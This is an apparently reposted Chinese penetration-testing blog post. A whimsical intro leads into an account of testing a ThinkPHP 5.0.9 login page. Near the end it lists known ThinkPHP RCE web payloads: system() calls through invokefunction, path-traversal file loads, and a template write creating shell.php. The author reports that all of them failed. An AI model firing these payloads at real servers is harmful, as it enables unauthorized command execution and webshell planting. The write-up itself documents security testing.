RCE再现

发布于2025年6月13日2025年7月25日作者:cve-20

原文链接: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247497725&idx=1&sn=9acb221e666940eb40092a4f96f6dd25

RCE再现

迪哥讲事 2025-06-13 08:33

春日午后，我沿着杨柳大道悠闲溜达。暖融融的阳光穿过新抽嫩芽的柳枝，在柏油路上折射出细碎的金斑。道旁绿化带里，嫩绿的草叶间零星点缀着淡紫色野花，春风拂过，柳絮如雪般轻盈飘落。不经意间，一抹黑色闯入视野 —— 绿化带边缘的枯叶堆里，半支黑色 U 盘闪着金属冷光，在阳光下折射出奇异的反光，像是在无声地召唤。我弯腰拨开杂草捡起它，发现 U 盘外壳上斑驳的标签写着 “RCE 备份”，边缘还残留着些许泥土，谁能想到这个被遗落在春意里的小小物件，竟藏着两年前的远程命令执行漏洞代码。

风掀起桌上的 A4 纸，我望着窗外随风摇曳的柳枝，忽然觉得这场景像极了此刻攥在掌心的 U 盘 —— 有些秘密，总藏在最意想不到的角落，等着被阳光照亮的瞬间，抖落满身尘埃。

唰～，我从梦里醒来，看着手机上亮眼的 9.05，我知道，那是我快迟到了。

看着年年都一样的资产，甚至难堪，漏洞越挖越少，安全等级越来越高，但还是要进行季度测试

打开资产表，随机选中一个，映入眼前的，则是普通的登录页面，只是颜色过于单调

首先脑海里浮现很多知识，突然有人开口说先测弱口令，另一个则说测个毛线弱口令，我天天看他挖漏洞，一个弱口令都没挖到。

. . . . . .

stop，你俩安静点，思路都被你们扰乱了。

随后，按照登陆框测试思路，我先打开谷歌插件，查看 js 路径，就这么几条，还挖个屁

但是看到路径，有似曾相识的赶紧，原来是 thinkphp 老前辈

为了验证结果，我在域名后面输入 aaaaa，然后报错信息中确定了 thinkphp，并且版本是 5.0.9

于是掏出祖传扫描工具，开始进行探测

为什么要这么对我，我到底哪里做错了，为什么一个 poc 都没成功，哦不！！！！

忽然我看到了一抹曙光，那是注册按钮

发送成功，但是手机却没收到验证码，又一次伤了我的心

于是针对特定版本搜索 poc

?s=index/think\config/get&name=database.username?s=index/\think\Lang/load&file=../../test.jpg?s=index/\think\Config/load&file=../../t.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami?s=index/\think\Request/input&filter[]=system&data=pwd?s=index/\think\view\driver\Php/display&content=<?phpphpinfo();?>?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?phpphpinfo();?>?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

五一例外，全是 error